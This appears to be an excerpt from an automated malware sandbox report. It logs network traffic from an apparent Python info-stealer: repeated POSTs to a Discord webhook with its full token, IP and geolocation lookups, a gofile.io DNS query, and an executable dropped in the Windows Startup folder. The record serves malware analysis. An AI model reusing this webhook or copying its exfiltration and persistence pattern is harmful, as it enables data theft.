Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 506Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Code function: 10_2_00007FFBBB7F3E40 PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,WSARecvFrom,PyEval_RestoreThread,WSAGetLastError,SetEvent,_Py_NoneStruct,

10_2_00007FFBBB7F3E40

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
Source: global traffic	HTTP traffic detected: GET /jsonp/8.46.123.33 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: geolocation-db.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:46 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2c2548ac7cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453928x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xovJQK%2BUb%2BSRoiWGWkZ%2FgK%2FXYFN8quOhjeQVzrVNZhFTlqUu%2BRoTMkJ8aKXQCTOZR2Fiyxi3zI%2FAWqzoIfMqas%2BNd%2F9z5lWD4Fw3f%2B2rX3NvfiQZgq%2F%2Fw4YCseFD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2c2548ac7cec11ef96902e88ff6945860574171a8514fb3dbed8872d2b00dc2dccec3c3323101a3641fb73b584d3e0dd; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=d88352afcbe6c0495ada4acc41fdf5b344043843-1727453926; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2c884cae7cec11efb7d996c5ef0f4df4; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453928x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSKOyIVVhqjejoFtO0Y62dBcZKdHqGnV96QBVRkYjfz%2BB3FJ2X5fqSJLqRJeM3Nfz61owU5d0917%2FmmRa2OGz1UVQolOJivICCKm4nVjLZljCq17CcJ1XRHlPsYr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2c884cae7cec11efb7d996c5ef0f4df4af77d857d1ca82c06705918a393e1383f4d5bb766d3204b3dbd951095cc23a8e; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2ceda5867cec11efb49f26388b8e290c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453929x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VLiIZL9CiQDwsZsVVM8xkihe3RdWMatsLZYBBAjlz8rE9BHI2e5hEMvigE6G%2FL8Jc4DZ8agV%2F3NwXezHs%2BzHNaIa5duVfIB5aZqf4xvbW1NQ5TWu7ICnloS2teB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2ceda5867cec11efb49f26388b8e290c1c04bc1da02c529961f307b8cc5d202341e437e6ba8755640047164057bc7b5c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:48 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2d51653a7cec11efbc503afbab16203a; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453930x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2Bjsb%2FW%2FfUaqsU7MA8A8TOSiqI00aN8mmv3uUl7Z4NFiAC1%2BNK1wnK%2F%2FPd%2FdhXw7SSi%2Fk1DrihQ%2FHh2pz6sd8bvu%2BrxZ7VE71oXmt4QCpyq10SZ%2FRvjqyPc%2FwGj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2d51653a7cec11efbc503afbab16203aa9b8cbaa67aebaf0008bcea960b22ff7f92bd80335a265625fda557de3aa0079; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=74796d8ae5164ae6da566c41aec5bf5b1d4c8013-1727453928; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2db5f4c87cec11ef9f2fea3c9a69472c; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453930x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvXOxl5GduNF6QQBTn4VjDMmJuCct0yF7KCzgh1xZaHmMAlA9tURtileaYSYRVwsX0qVP875FsETEy%2Bc%2BbeBN6PJp4rorgwLZWLTT8EF7PNHYQs6DD7MeSu2NZZR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2db5f4c87cec11ef9f2fea3c9a69472c647c95a3107240db7e30f3e52fd1ce39c773bfe25bc2e7394de89af0e12b41ca; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
